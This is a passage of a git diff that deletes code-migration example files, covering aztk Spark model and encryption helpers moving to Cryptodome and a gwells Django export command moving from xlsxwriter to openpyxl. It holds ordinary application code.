-class ClusterConfiguration(aztk.models.ClusterConfiguration):
-    def __init__(
-            self,
-            custom_scripts: List[CustomScript] = None,
-            file_shares: List[FileShare] = None,
-            cluster_id: str = None,
-            vm_count=0,
-            vm_low_pri_count=0,
-            vm_size=None,
-            subnet_id=None,
-            toolkit: SparkToolkit = None,
-            user_configuration: UserConfiguration = None,
-            spark_configuration: SparkConfiguration = None,
-            worker_on_master: bool = None):
-        super().__init__(
-            custom_scripts=custom_scripts,
-            cluster_id=cluster_id,
-            vm_count=vm_count,
-            vm_low_pri_count=vm_low_pri_count,
-            vm_size=vm_size,
-            toolkit=toolkit,
-            subnet_id=subnet_id,
-            file_shares=file_shares,
-            user_configuration=user_configuration,
-        )
-        self.spark_configuration = spark_configuration
-        self.worker_on_master = worker_on_master
-
-    def merge(self, other):
-        super().merge(other)
-        self._merge_attributes(other, ["spark_configuration", "worker_on_master"])
-
-
-class SecretsConfiguration(aztk.models.SecretsConfiguration):
-    pass
-
-
-class VmImage(aztk.models.VmImage):
-    pass
-
-
-class ApplicationConfiguration:
-    def __init__(
-            self,
-            name=None,
-            application=None,
-            application_args=None,
-            main_class=None,
-            jars=None,
-            py_files=None,
-            files=None,
-            driver_java_options=None,
-            driver_library_path=None,
-            driver_class_path=None,
-            driver_memory=None,
-            executor_memory=None,
-            driver_cores=None,
-            executor_cores=None,
-            max_retry_count=None):
-        self.name = name
-        self.application = application
-        self.application_args = application_args
-        self.main_class = main_class
-        self.jars = jars or []
-        self.py_files = py_files or []
-        self.files = files or []
-        self.driver_java_options = driver_java_options
-        self.driver_library_path = driver_library_path
-        self.driver_class_path = driver_class_path
-        self.driver_memory = driver_memory
-        self.executor_memory = executor_memory
-        self.driver_cores = driver_cores
-        self.executor_cores = executor_cores
-        self.max_retry_count = max_retry_count
-
-
-class Application:
-    def __init__(self, cloud_task: batch_models.CloudTask):
-        self.name = cloud_task.id
-        self.last_modified = cloud_task.last_modified
-        self.creation_time = cloud_task.creation_time
-        self.state = cloud_task.state._value_
-        self.state_transition_time = cloud_task.state_transition_time
-        self.exit_code = cloud_task.execution_info.exit_code
-        if cloud_task.previous_state:
-            self.previous_state = cloud_task.previous_state._value_
-            self.previous_state_transition_time = cloud_task.previous_state_transition_time
-
-        self._execution_info = cloud_task.execution_info
-        self._node_info = cloud_task.node_info
-        self._stats = cloud_task.stats
-        self._multi_instance_settings = cloud_task.multi_instance_settings
-        self._display_name = cloud_task.display_name
-        self._exit_conditions = cloud_task.exit_conditions
-        self._command_line = cloud_task.command_line
-        self._resource_files = cloud_task.resource_files
-        self._output_files = cloud_task.output_files
-        self._environment_settings = cloud_task.environment_settings
-        self._affinity_info = cloud_task.affinity_info
-        self._constraints = cloud_task.constraints
-        self._user_identity = cloud_task.user_identity
-        self._depends_on = cloud_task.depends_on
-        self._application_package_references = cloud_task.application_package_references
-        self._authentication_token_settings = cloud_task.authentication_token_settings
-        self._url = cloud_task.url
-        self._e_tag = cloud_task.e_tag
-
-
-class JobConfiguration:
-    def __init__(
-            self,
-            id,
-            applications,
-            vm_size,
-            custom_scripts=None,
-            spark_configuration=None,
-            toolkit=None,
-            max_dedicated_nodes=0,
-            max_low_pri_nodes=0,
-            subnet_id=None,
-            worker_on_master=None):
-        self.id = id
-        self.applications = applications
-        self.custom_scripts = custom_scripts
-        self.spark_configuration = spark_configuration
-        self.vm_size = vm_size
-        self.gpu_enabled = helpers.is_gpu_enabled(vm_size)
-        self.toolkit = toolkit
-        self.max_dedicated_nodes = max_dedicated_nodes
-        self.max_low_pri_nodes = max_low_pri_nodes
-        self.subnet_id = subnet_id
-        self.worker_on_master = worker_on_master
-
-    def to_cluster_config(self):
-        return ClusterConfiguration(
-            cluster_id=self.id,
-            custom_scripts=self.custom_scripts,
-            toolkit=self.toolkit,
-            vm_size=self.vm_size,
-            vm_count=self.max_dedicated_nodes,
-            vm_low_pri_count=self.max_low_pri_nodes,
-            subnet_id=self.subnet_id,
-            worker_on_master=self.worker_on_master,
-            spark_configuration=self.spark_configuration,
-        )
-
-    def mixed_mode(self) -> bool:
-        return self.max_dedicated_nodes > 0 and self.max_low_pri_nodes > 0
-
-    def get_docker_repo(self) -> str:
-        return self.toolkit.get_docker_repo(self.gpu_enabled)
-
-    def validate(self) -> bool:
-        """
-        Validate the config at its current state.
-        Raises: Error if invalid
-        """
-        if self.toolkit is None:
-            raise error.InvalidModelError(
-                "Please supply a toolkit in the cluster configuration")
-
-        self.toolkit.validate()
-
-        if self.id is None:
-            raise error.AztkError("Please supply an ID for the Job in your configuration.")
-
-        if self.max_dedicated_nodes == 0 and self.max_low_pri_nodes == 0:
-            raise error.AztkError(
-                "Please supply a valid (greater than 0) value for either max_dedicated_nodes or max_low_pri_nodes in your configuration."
-            )
-
-        if self.vm_size is None:
-            raise error.AztkError(
-                "Please supply a vm_size in your configuration."
-            )
-
-        if self.mixed_mode() and not self.subnet_id:
-            raise error.AztkError(
-                "You must configure a VNET to use AZTK in mixed mode (dedicated and low priority nodes) and pass the subnet_id in your configuration.."
-            )
-
-
-class JobState():
-    complete = 'completed'
-    active = "active"
-    completed = "completed"
-    disabled = "disabled"
-    terminating = "terminating"
-    deleting = "deleting"
-
-
-class Job():
-    def __init__(self, cloud_job_schedule: batch_models.CloudJobSchedule,
-                 cloud_tasks: List[batch_models.CloudTask] = None,
-                 pool: batch_models.CloudPool = None,
-                 nodes: batch_models.ComputeNodePaged = None):
-        self.id = cloud_job_schedule.id
-        self.last_modified = cloud_job_schedule.last_modified
-        self.state = cloud_job_schedule.state._value_
-        self.state_transition_time = cloud_job_schedule.state_transition_time
-        self.creation_time = cloud_job_schedule.creation_time
-        self.applications = [Application(task) for task in (cloud_tasks or [])]
-        if pool:
-            self.cluster = Cluster(pool, nodes)
-        else:
-            self.cluster = None
-
-
-class ApplicationLog():
-    def __init__(self, name: str, cluster_id: str, log: str, total_bytes: int, application_state: batch_models.TaskState, exit_code: int):
-        self.name = name
-        self.cluster_id = cluster_id # TODO: change to something cluster/job agnostic
-        self.log = log
-        self.total_bytes = total_bytes
-        self.application_state = application_state
-        self.exit_code = exit_code
diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.target.py b/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.target.py
deleted file mode 100644
index 47feba4..0000000
--- a/v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.target.py
+++ /dev/null
@@ -1,312 +0,0 @@
-from typing import List
-from Cryptodome.PublicKey import RSA
-import azure.batch.models as batch_models
-import aztk.models
-from aztk import error
-from aztk.utils import constants, helpers
-
-class SparkToolkit(aztk.models.Toolkit):
-    def __init__(self, version: str, environment: str = None, environment_version: str = None):
-        super().__init__(
-            version=version,
-            environment=environment,
-            environment_version=environment_version,
-        )
-
-
-class Cluster(aztk.models.Cluster):
-    def __init__(self, pool: batch_models.CloudPool = None, nodes: batch_models.ComputeNodePaged = None):
-        super().__init__(pool, nodes)
-        self.master_node_id = self.__get_master_node_id()
-        self.gpu_enabled = helpers.is_gpu_enabled(pool.vm_size)
-
-    def is_pool_running_spark(self, pool: batch_models.CloudPool):
-        if pool.metadata is None:
-            return False
-
-        for metadata in pool.metadata:
-            if metadata.name == constants.AZTK_SOFTWARE_METADATA_KEY:
-                return metadata.value == aztk.models.Software.spark
-
-        return False
-
-    def __get_master_node_id(self):
-        """
-        :returns: the id of the node that is the assigned master of this pool
-        """
-        if self.pool.metadata is None:
-            return None
-
-        for metadata in self.pool.metadata:
-            if metadata.name == constants.MASTER_NODE_METADATA_KEY:
-                return metadata.value
-
-        return None
-
-
-class RemoteLogin(aztk.models.RemoteLogin):
-    pass
-
-
-class File(aztk.models.File):
-    pass
-
-
-class SparkConfiguration():
-    def __init__(self, spark_defaults_conf=None, spark_env_sh=None, core_site_xml=None, jars=None):
-        self.spark_defaults_conf = spark_defaults_conf
-        self.spark_env_sh = spark_env_sh
-        self.core_site_xml = core_site_xml
-        self.jars = jars
-        self.ssh_key_pair = self.__generate_ssh_key_pair()
-
-    def __generate_ssh_key_pair(self):
-        key = RSA.generate(2048)
-        priv_key = key.exportKey('PEM')
-        pub_key = key.publickey().exportKey('OpenSSH')
-        return {'pub_key': pub_key, 'priv_key': priv_key}
-
-
-class CustomScript(aztk.models.CustomScript):
-    pass
-
-
-class FileShare(aztk.models.FileShare):
-    pass
-
-
-class UserConfiguration(aztk.models.UserConfiguration):
-    pass
-
-
-class ServicePrincipalConfiguration(aztk.models.ServicePrincipalConfiguration):
-    pass
-
-
-class SharedKeyConfiguration(aztk.models.SharedKeyConfiguration):
-    pass
-
-
-class DockerConfiguration(aztk.models.DockerConfiguration):
-    pass
-
-class PluginConfiguration(aztk.models.PluginConfiguration):
-    pass
-
-
-class ClusterConfiguration(aztk.models.ClusterConfiguration):
-    def __init__(
-            self,
-            custom_scripts: List[CustomScript] = None,
-            file_shares: List[FileShare] = None,
-            cluster_id: str = None,
-            vm_count=0,
-            vm_low_pri_count=0,
-            vm_size=None,
-            subnet_id=None,
-            toolkit: SparkToolkit = None,
-            user_configuration: UserConfiguration = None,
-            spark_configuration: SparkConfiguration = None,
-            worker_on_master: bool = None):
-        super().__init__(
-            custom_scripts=custom_scripts,
-            cluster_id=cluster_id,
-            vm_count=vm_count,
-            vm_low_pri_count=vm_low_pri_count,
-            vm_size=vm_size,
-            toolkit=toolkit,
-            subnet_id=subnet_id,
-            file_shares=file_shares,
-            user_configuration=user_configuration,
-        )
-        self.spark_configuration = spark_configuration
-        self.worker_on_master = worker_on_master
-
-    def merge(self, other):
-        super().merge(other)
-        self._merge_attributes(other, ["spark_configuration", "worker_on_master"])
-
-
-class SecretsConfiguration(aztk.models.SecretsConfiguration):
-    pass
-
-
-class VmImage(aztk.models.VmImage):
-    pass
-
-
-class ApplicationConfiguration:
-    def __init__(
-            self,
-            name=None,
-            application=None,
-            application_args=None,
-            main_class=None,
-            jars=None,
-            py_files=None,
-            files=None,
-            driver_java_options=None,
-            driver_library_path=None,
-            driver_class_path=None,
-            driver_memory=None,
-            executor_memory=None,
-            driver_cores=None,
-            executor_cores=None,
-            max_retry_count=None):
-        self.name = name
-        self.application = application
-        self.application_args = application_args
-        self.main_class = main_class
-        self.jars = jars or []
-        self.py_files = py_files or []
-        self.files = files or []
-        self.driver_java_options = driver_java_options
-        self.driver_library_path = driver_library_path
-        self.driver_class_path = driver_class_path
-        self.driver_memory = driver_memory
-        self.executor_memory = executor_memory
-        self.driver_cores = driver_cores
-        self.executor_cores = executor_cores
-        self.max_retry_count = max_retry_count
-
-
-class Application:
-    def __init__(self, cloud_task: batch_models.CloudTask):
-        self.name = cloud_task.id
-        self.last_modified = cloud_task.last_modified
-        self.creation_time = cloud_task.creation_time
-        self.state = cloud_task.state._value_
-        self.state_transition_time = cloud_task.state_transition_time
-        self.exit_code = cloud_task.execution_info.exit_code
-        if cloud_task.previous_state:
-            self.previous_state = cloud_task.previous_state._value_
-            self.previous_state_transition_time = cloud_task.previous_state_transition_time
-
-        self._execution_info = cloud_task.execution_info
-        self._node_info = cloud_task.node_info
-        self._stats = cloud_task.stats
-        self._multi_instance_settings = cloud_task.multi_instance_settings
-        self._display_name = cloud_task.display_name
-        self._exit_conditions = cloud_task.exit_conditions
-        self._command_line = cloud_task.command_line
-        self._resource_files = cloud_task.resource_files
-        self._output_files = cloud_task.output_files
-        self._environment_settings = cloud_task.environment_settings
-        self._affinity_info = cloud_task.affinity_info
-        self._constraints = cloud_task.constraints
-        self._user_identity = cloud_task.user_identity
-        self._depends_on = cloud_task.depends_on
-        self._application_package_references = cloud_task.application_package_references
-        self._authentication_token_settings = cloud_task.authentication_token_settings
-        self._url = cloud_task.url
-        self._e_tag = cloud_task.e_tag
-
-
-class JobConfiguration:
-    def __init__(
-            self,
-            id,
-            applications,
-            vm_size,
-            custom_scripts=None,
-            spark_configuration=None,
-            toolkit=None,
-            max_dedicated_nodes=0,
-            max_low_pri_nodes=0,
-            subnet_id=None,
-            worker_on_master=None):
-        self.id = id
-        self.applications = applications
-        self.custom_scripts = custom_scripts
-        self.spark_configuration = spark_configuration
-        self.vm_size = vm_size
-        self.gpu_enabled = helpers.is_gpu_enabled(vm_size)
-        self.toolkit = toolkit
-        self.max_dedicated_nodes = max_dedicated_nodes
-        self.max_low_pri_nodes = max_low_pri_nodes
-        self.subnet_id = subnet_id
-        self.worker_on_master = worker_on_master
-
-    def to_cluster_config(self):
-        return ClusterConfiguration(
-            cluster_id=self.id,
-            custom_scripts=self.custom_scripts,
-            toolkit=self.toolkit,
-            vm_size=self.vm_size,
-            vm_count=self.max_dedicated_nodes,
-            vm_low_pri_count=self.max_low_pri_nodes,
-            subnet_id=self.subnet_id,
-            worker_on_master=self.worker_on_master,
-            spark_configuration=self.spark_configuration,
-        )
-
-    def mixed_mode(self) -> bool:
-        return self.max_dedicated_nodes > 0 and self.max_low_pri_nodes > 0
-
-    def get_docker_repo(self) -> str:
-        return self.toolkit.get_docker_repo(self.gpu_enabled)
-
-    def validate(self) -> bool:
-        """
-        Validate the config at its current state.
-        Raises: Error if invalid
-        """
-        if self.toolkit is None:
-            raise error.InvalidModelError(
-                "Please supply a toolkit in the cluster configuration")
-
-        self.toolkit.validate()
-
-        if self.id is None:
-            raise error.AztkError("Please supply an ID for the Job in your configuration.")
-
-        if self.max_dedicated_nodes == 0 and self.max_low_pri_nodes == 0:
-            raise error.AztkError(
-                "Please supply a valid (greater than 0) value for either max_dedicated_nodes or max_low_pri_nodes in your configuration."
-            )
-
-        if self.vm_size is None:
-            raise error.AztkError(
-                "Please supply a vm_size in your configuration."
-            )
-
-        if self.mixed_mode() and not self.subnet_id:
-            raise error.AztkError(
-                "You must configure a VNET to use AZTK in mixed mode (dedicated and low priority nodes) and pass the subnet_id in your configuration.."
-            )
-
-
-class JobState():
-    complete = 'completed'
-    active = "active"
-    completed = "completed"
-    disabled = "disabled"
-    terminating = "terminating"
-    deleting = "deleting"
-
-
-class Job():
-    def __init__(self, cloud_job_schedule: batch_models.CloudJobSchedule,
-                 cloud_tasks: List[batch_models.CloudTask] = None,
-                 pool: batch_models.CloudPool = None,
-                 nodes: batch_models.ComputeNodePaged = None):
-        self.id = cloud_job_schedule.id
-        self.last_modified = cloud_job_schedule.last_modified
-        self.state = cloud_job_schedule.state._value_
-        self.state_transition_time = cloud_job_schedule.state_transition_time
-        self.creation_time = cloud_job_schedule.creation_time
-        self.applications = [Application(task) for task in (cloud_tasks or [])]
-        if pool:
-            self.cluster = Cluster(pool, nodes)
-        else:
-            self.cluster = None
-
-
-class ApplicationLog():
-    def __init__(self, name: str, cluster_id: str, log: str, total_bytes: int, application_state: batch_models.TaskState, exit_code: int):
-        self.name = name
-        self.cluster_id = cluster_id # TODO: change to something cluster/job agnostic
-        self.log = log
-        self.total_bytes = total_bytes
-        self.application_state = application_state
-        self.exit_code = exit_code
diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.diff b/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.diff
deleted file mode 100644
index d34a3e3..0000000
--- a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.diff
+++ /dev/null
@@ -1,14 +0,0 @@
-diff --git a/aztk/utils/secure_utils.py b/aztk/utils/secure_utils.py
- index 3d16cf39545e39ee52fa350c7f251c2cc8679228..19dde429a702c29bdcf86a69805053ecfd02edee 100644
- --- a/aztk/utils/secure_utils.py
- +++ b/aztk/utils/secure_utils.py
-@@ -1,6 +1,6 @@
--from Crypto.PublicKey import RSA
--from Crypto.Random import get_random_bytes
--from Crypto.Cipher import AES, PKCS1_OAEP
-+from Cryptodome.PublicKey import RSA
-+from Cryptodome.Random import get_random_bytes
-+from Cryptodome.Cipher import AES, PKCS1_OAEP
-
- def encrypt_password(ssh_pub_key, password):
-     if not password:
diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.source.py b/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.source.py
deleted file mode 100644
index 459cc3a..0000000
--- a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.source.py
+++ /dev/null
@@ -1,18 +0,0 @@
-from Crypto.PublicKey import RSA
-from Crypto.Random import get_random_bytes
-from Crypto.Cipher import AES, PKCS1_OAEP
-
-def encrypt_password(ssh_pub_key, password):
-    if not password:
-        return [None, None, None, None]
-    recipient_key = RSA.import_key(ssh_pub_key)
-    session_key = get_random_bytes(16)
-
-    # Encrypt the session key with the public RSA key
-    cipher_rsa = PKCS1_OAEP.new(recipient_key)
-    encrypted_aes_session_key = cipher_rsa.encrypt(session_key)
-
-    # Encrypt the data with the AES session key
-    cipher_aes = AES.new(session_key, AES.MODE_EAX)
-    ciphertext, tag = cipher_aes.encrypt_and_digest(password.encode())
-    return [encrypted_aes_session_key, cipher_aes.nonce, tag, ciphertext]
diff --git a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.target.py b/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.target.py
deleted file mode 100644
index 843b3d1..0000000
--- a/v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.target.py
+++ /dev/null
@@ -1,18 +0,0 @@
-from Cryptodome.PublicKey import RSA
-from Cryptodome.Random import get_random_bytes
-from Cryptodome.Cipher import AES, PKCS1_OAEP
-
-def encrypt_password(ssh_pub_key, password):
-    if not password:
-        return [None, None, None, None]
-    recipient_key = RSA.import_key(ssh_pub_key)
-    session_key = get_random_bytes(16)
-
-    # Encrypt the session key with the public RSA key
-    cipher_rsa = PKCS1_OAEP.new(recipient_key)
-    encrypted_aes_session_key = cipher_rsa.encrypt(session_key)
-
-    # Encrypt the data with the AES session key
-    cipher_aes = AES.new(session_key, AES.MODE_EAX)
-    ciphertext, tag = cipher_aes.encrypt_and_digest(password.encode())
-    return [encrypted_aes_session_key, cipher_aes.nonce, tag, ciphertext]
diff --git a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.diff b/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.diff
deleted file mode 100644
index 519b186..0000000
--- a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.diff
+++ /dev/null
@@ -1,127 +0,0 @@
-diff --git a/app/backend/wells/management/commands/export.py b/app/backend/wells/management/commands/export.py
- index e2e9915cec9556564e51e0e6d79eb6bec8f64c30..472f336f5db32ead27b6f4e171c6b8f782da8a02 100644
- --- a/app/backend/wells/management/commands/export.py
- +++ b/app/backend/wells/management/commands/export.py
-@@ -2,16 +2,16 @@ import csv
- import zipfile
- import os
- import logging
-+import string
-
- from django.core.management.base import BaseCommand
- from django.db import models
- from django.db import connection
-
- from minio import Minio
--import xlsxwriter
-+from openpyxl import Workbook
-
- from gwells.settings.base import get_env_variable
--from wells.models import Well, LithologyDescription, Casing, Screen, ProductionData, Perforation
-
- # Run from command line :
- # python manage.py export
-@@ -50,7 +50,7 @@ class Command(BaseCommand):
-
-     def export(self, workbook, gwells_zip, worksheet_name, cursor):
-         logger.info('exporting {}'.format(worksheet_name))
--        worksheet = workbook.add_worksheet(worksheet_name)
-+        worksheet = workbook.create_sheet(worksheet_name)
-         csv_file = '{}.csv'.format(worksheet_name)
-         if os.path.exists(csv_file):
-             os.remove(csv_file)
-@@ -60,8 +60,8 @@ class Command(BaseCommand):
-             values = []
-             # Write the headings
-             for index, field in enumerate(cursor.description):
--                worksheet.write(0, index, '{}'.format(field.name))
-                 values.append(field.name)
-+            worksheet.append(values)
-             csvwriter.writerow(values)
-
-             # Write the values
-@@ -70,16 +70,22 @@ class Command(BaseCommand):
-                 values = []
-                 num_values = 0
-                 for col, value in enumerate(record):
--                    if value:
-+                    if not (value == "" or value is None):
-                         num_values += 1
--                    values.append(value)
-+                        if type(value) is str:
-+                            # There are lots of non-printable characters in the source data that can cause
-+                            # issues in the export, so we have to clear them out.
-+                            v = ''.join([s for s in value if s in string.printable])
-+                            # We can't have something starting with an = sign,
-+                            # it would be interpreted as a formula in excel.
-+                            if v.startswith('='):
-+                                v = '\'{}'.format(v)
-+                            values.append(v)
-+                        else:
-+                            values.append(value)
-                 if num_values > 1:
--                    # We always have a well_tag_number, but if that's all we have, then just skip this record
--                    row_index += 1
--                    for col, value in enumerate(values):
--                        if value:
--                            worksheet.write(row_index, col, value)
-                     csvwriter.writerow(values)
-+                    worksheet.append(values)
-         gwells_zip.write(csv_file)
-         if os.path.exists(csv_file):
-             os.remove(csv_file)
-@@ -194,28 +200,29 @@ class Command(BaseCommand):
-         with zipfile.ZipFile(zip_filename, 'w') as gwells_zip:
-             if os.path.exists(spreadsheet_filename):
-                 os.remove(spreadsheet_filename)
--            with xlsxwriter.Workbook(spreadsheet_filename) as workbook:
--                # Well
--                with connection.cursor() as cursor:
--                    cursor.execute(well_sql)
--                    self.export(workbook, gwells_zip, 'well', cursor)
--                # Lithology
--                with connection.cursor() as cursor:
--                    cursor.execute(lithology_sql)
--                    self.export(workbook, gwells_zip, 'lithology', cursor)
--                # Casing
--                with connection.cursor() as cursor:
--                    cursor.execute(casing_sql)
--                    self.export(workbook, gwells_zip, 'casing', cursor)
--                # Screen
--                with connection.cursor() as cursor:
--                    cursor.execute(screen_sql)
--                    self.export(workbook, gwells_zip, 'screen', cursor)
--                # Production
--                with connection.cursor() as cursor:
--                    cursor.execute(production_sql)
--                    self.export(workbook, gwells_zip, 'production', cursor)
--                # Perforation
--                with connection.cursor() as cursor:
--                    cursor.execute(perforation_sql)
--                    self.export(workbook, gwells_zip, 'perforation', cursor)
-+            workbook = Workbook(write_only=True)
-+            # Well
-+            with connection.cursor() as cursor:
-+                cursor.execute(well_sql)
-+                self.export(workbook, gwells_zip, 'well', cursor)
-+            # Lithology
-+            with connection.cursor() as cursor:
-+                cursor.execute(lithology_sql)
-+                self.export(workbook, gwells_zip, 'lithology', cursor)
-+            # Casing
-+            with connection.cursor() as cursor:
-+                cursor.execute(casing_sql)
-+                self.export(workbook, gwells_zip, 'casing', cursor)
-+            # Screen
-+            with connection.cursor() as cursor:
-+                cursor.execute(screen_sql)
-+                self.export(workbook, gwells_zip, 'screen', cursor)
-+            # Production
-+            with connection.cursor() as cursor:
-+                cursor.execute(production_sql)
-+                self.export(workbook, gwells_zip, 'production', cursor)
-+            # Perforation
-+            with connection.cursor() as cursor:
-+                cursor.execute(perforation_sql)
-+                self.export(workbook, gwells_zip, 'perforation', cursor)
-+            workbook.save(filename=spreadsheet_filename)
diff --git a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.source.py b/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.source.py
deleted file mode 100644
index 0ce5602..0000000
--- a/v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.source.py
+++ /dev/null
@@ -1,221 +0,0 @@
-import csv
-import zipfile
-import os
-import logging
-
-from django.core.management.base import BaseCommand
-from django.db import models
-from django.db import connection
-
-from minio import Minio
-import xlsxwriter
-
-from gwells.settings.base import get_env_variable
-from wells.models import Well, LithologyDescription, Casing, Screen, ProductionData, Perforation
-
-# Run from command line :
-# python manage.py export
-
-logger = logging.getLogger(__name__)
-
-
-class Command(BaseCommand):
-
-    def handle(self, *args, **options):
-        logger.info('starting export')
-        zip_filename = 'gwells.zip'
-        spreadsheet_filename = 'gwells.xlsx'
-        self.generate_files(zip_filename, spreadsheet_filename)
-        self.upload_files(zip_filename, spreadsheet_filename)
-        logger.info('cleaning up')
-        for filename in (zip_filename, spreadsheet_filename):
-            if os.path.exists(filename):
-                os.remove(filename)
-        logger.info('export complete')
-
-    def upload_files(self, zip_filename, spreadsheet_filename):
-        minioClient = Minio(get_env_variable('S3_HOST'),
-                            access_key=get_env_variable('S3_PUBLIC_ACCESS_KEY'),
-                            secret_key=get_env_variable('S3_PUBLIC_SECRET_KEY'),
-                            secure=True)
-        for filename in (zip_filename, spreadsheet_filename):
-            logger.info('uploading {}'.format(filename))
-            with open(filename, 'rb') as file_data:
-                file_stat = os.stat(filename)
-                # Do we need to remove the existing files 1st?
-                minioClient.put_object(get_env_variable('S3_WELL_EXPORT_BUCKET'),
-                                       filename,
-                                       file_data,
-                                       file_stat.st_size)
-
-    def export(self, workbook, gwells_zip, worksheet_name, cursor):
-        logger.info('exporting {}'.format(worksheet_name))
-        worksheet = workbook.add_worksheet(worksheet_name)
-        csv_file = '{}.csv'.format(worksheet_name)
-        if os.path.exists(csv_file):
-            os.remove(csv_file)
-        with open(csv_file, 'w') as csvfile:
-            csvwriter = csv.writer(csvfile, dialect='excel')
-
-            values = []
-            # Write the headings
-            for index, field in enumerate(cursor.description):
-                worksheet.write(0, index, '{}'.format(field.name))
-                values.append(field.name)
-            csvwriter.writerow(values)
-
-            # Write the values
-            row_index = 0
-            for row, record in enumerate(cursor.fetchall()):
-                values = []
-                num_values = 0
-                for col, value in enumerate(record):
-                    if value:
-                        num_values += 1
-                    values.append(value)
-                if num_values > 1:
-                    # We always have a well_tag_number, but if that's all we have, then just skip this record
-                    row_index += 1
-                    for col, value in enumerate(values):
-                        if value:
-                            worksheet.write(row_index, col, value)
-                    csvwriter.writerow(values)
-        gwells_zip.write(csv_file)
-        if os.path.exists(csv_file):
-            os.remove(csv_file)
-
-    def generate_files(self, zip_filename, spreadsheet_filename):
-        #######
-        # WELL
-        #######
-        well_sql = ("""select well_tag_number, identification_plate_number,
-                    well_identification_plate_attached,
-                    well_status_code, well.well_class_code,
-                    wsc.well_class_code as well_subclass,
-                    intended_water_use_code, licenced_status_code,
-                    observation_well_number, obs_well_status_code, water_supply_system_name,
-                    water_supply_system_well_name,
-                    street_address, city, legal_lot, legal_plan, legal_district_lot, legal_block,
-                    legal_section, legal_township, legal_range,
-                    land_district_code,
-                    legal_pid,
-                    well_location_description,
-                    latitude, longitude, utm_zone_code, utm_northing, utm_easting,
-                    utm_accuracy_code, bcgs_id,
-                    construction_start_date, construction_end_date, alteration_start_date,
-                    alteration_end_date, decommission_start_date, decommission_end_date,
-                    driller_name, consultant_name, consultant_company,
-                    diameter, total_depth_drilled, finished_well_depth, final_casing_stick_up,
-                    bedrock_depth, ground_elevation, ground_elevation_method_code, static_water_level,
-                    well_yield,
-                    well_yield_unit_code,
-                    artesian_flow, artesian_pressure, well_cap_type, well_disinfected,
-                    drilling_method_code, other_drilling_method, well_orientation,
-                    alternative_specs_submitted,
-                    surface_seal_material_code, surface_seal_method_code, surface_seal_length,
-                    backfill_type,
-                    backfill_depth,
-                    liner_material_code, liner_diameter, liner_thickness, surface_seal_thickness,
-                    liner_from, liner_to,
-                    screen_intake_method_code, screen_type_code, screen_material_code,
-                    other_screen_material,
-                    screen_opening_code, screen_bottom_code, other_screen_bottom, development_method_code,
-                    filter_pack_from,
-                    filter_pack_to, filter_pack_material_code,
-                    filter_pack_thickness,
-                    filter_pack_material_size_code,
-                    development_hours, development_notes,
-                    water_quality_colour, water_quality_odour, ems_id,
-                    decommission_reason, decommission_method_code, decommission_details, sealant_material,
-                    backfill_material,
-                    comments, aquifer_id,
-                    drilling_company.drilling_company_code,
-                    ems,
-                    aquifer_id,
-                    registries_person.surname as driller_responsible
-                    from well
-                    left join well_subclass_code as wsc on wsc.well_subclass_guid = well.well_subclass_guid
-                    left join drilling_company on
-                    drilling_company.drilling_company_guid = well.drilling_company_guid
-                    left join registries_person on
-                    registries_person.person_guid = well.driller_responsible_guid
-                    order by well_tag_number""")
-        ###########
-        # LITHOLOGY
-        ###########
-        lithology_sql = ("""select well_tag_number, lithology_from, lithology_to, lithology_raw_data,
-                    ldc.description as lithology_description_code,
-                    lmc.description as lithology_material_code,
-                    lhc.description as lithology_hardness_code,
-                    lcc.description as lithology_colour_code,
-                    water_bearing_estimated_flow,
-                    well_yield_unit_code, lithology_observation
-                    from lithology_description
-                    left join lithology_description_code as ldc on
-                    ldc.lithology_description_code = lithology_description.lithology_description_code
-                    left join lithology_material_code as lmc on
-                    lmc.lithology_material_code = lithology_description.lithology_material_code
-                    left join lithology_hardness_code as lhc on
-                    lhc.lithology_hardness_code = lithology_description.lithology_hardness_code
-                    left join lithology_colour_code as lcc on
-                    lcc.lithology_colour_code = lithology_description.lithology_colour_code
-                    order by well_tag_number""")
-        ########
-        # CASING
-        ########
-        casing_sql = ("""select well_tag_number, casing_from, casing_to, diameter, casing_code,
-                    casing_material_code, wall_thickness, drive_shoe from casing
-                    order by well_tag_number""")
-        ########
-        # SCREEN
-        ########
-        screen_sql = ("""select well_tag_number, screen_from, screen_to, internal_diameter,
-                    screen_assembly_type_code, slot_size from screen
-                    order by well_tag_number""")
-        ############
-        # PRODUCTION
-        ############
-        production_sql = ("""select well_tag_number, yield_estimation_method_code, well_yield_unit_code,
-                    yield_estimation_rate,
-                    yield_estimation_duration, static_level, drawdown,
-                    hydro_fracturing_performed, hydro_fracturing_yield_increase from production_data
-                    order by well_tag_number""")
-        ##############
-        # PERFORATIONS
-        ##############
-        perforation_sql = ("""select well_tag_number, liner_from, liner_to, liner_diameter,
-                    liner_perforation_from, liner_perforation_to, liner_thickness
-                    from
-                    perforation
-                    order by well_tag_number""")
-
-        if os.path.exists(zip_filename):
-            os.remove(zip_filename)
-        with zipfile.ZipFile(zip_filename, 'w') as gwells_zip:
-            if os.path.exists(spreadsheet_filename):
-                os.remove(spreadsheet_filename)
-            with xlsxwriter.Workbook(spreadsheet_filename) as workbook:
-                # Well
-                with connection.cursor() as cursor:
-                    cursor.execute(well_sql)
-                    self.export(workbook, gwells_zip, 'well', cursor)
-                # Lithology
-                with connection.cursor() as cursor:
-                    cursor.execute(lithology_sql)
